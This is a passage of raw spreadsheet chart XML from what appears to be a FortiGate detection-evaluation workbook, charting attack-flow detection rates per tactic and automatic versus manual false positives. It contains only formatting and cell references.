            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="2"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.5861807786321024"/>
                  <c:y val="0.32162519190260286"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr/>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$27:$DT$27</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DX$45:$EA$45</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>SIN ALERTA</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="EA4335"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$27:$DT$27</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DX$46:$EA$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1938073385"/>
        <c:axId val="1375111934"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1938073385"/>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1375111934"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1375111934"/>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938073385"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart45.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN TOTAL DE FLUJOS POR TÁCTICA - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$G$17</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$16:$U$16</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$17:$U$17</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1196241853"/>
        <c:axId val="776878730"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1196241853"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Concepto/Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="776878730"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="776878730"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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Flujos con Ataque Totales Detectados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196241853"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart46.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO DE FLUJOS POR TÁCTICA - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$G$22</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$16:$U$16</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$22:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1562263707"/>
        <c:axId val="935378671"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1562263707"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Concepto/Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="935378671"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="935378671"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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Flujos con Ataque Totales Detectados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562263707"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart47.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS DETECTADOS - FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$C$36:$C$37</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$D$36:$D$37</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart48.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual FG por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DC$9:$DC$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DL$9:$DL$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DC$9:$DC$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DH$9:$DH$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1921699738"/>
        <c:axId val="157556690"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1921699738"/>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157556690"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="157556690"/>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921699738"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart49.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual FG Total</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng" w="76200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DH$49</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DJ$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DH$49</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DI$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1126052602"/>
        <c:axId val="1673383701"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1126052602"/>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1673383701"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1673383701"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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126052602"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart50.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Flujos TP Detectados LV1 IPS y APP-CTRL</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$ED$12</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="073763"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$ED$13:$ED$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EE$12</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFD966"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EE$13:$EE$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="709598920"/>
        <c:axId val="1612124107"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="709598920"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica / Concepto</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1612124107"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1612124107"/>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709598920"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart5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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Flujos TP Detectados LV2 IPS y APP-CTRL</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EF$12</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="1C4587"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EF$13:$EF$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EG$12</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFD966"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="5"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EG$13:$EG$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="825936104"/>
        <c:axId val="12974756"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="825936104"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica / Concepto</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="12974756"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="12974756"/>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825936104"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.1876223509339081"/>
          <c:y val="0.15727048675292668"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart5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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
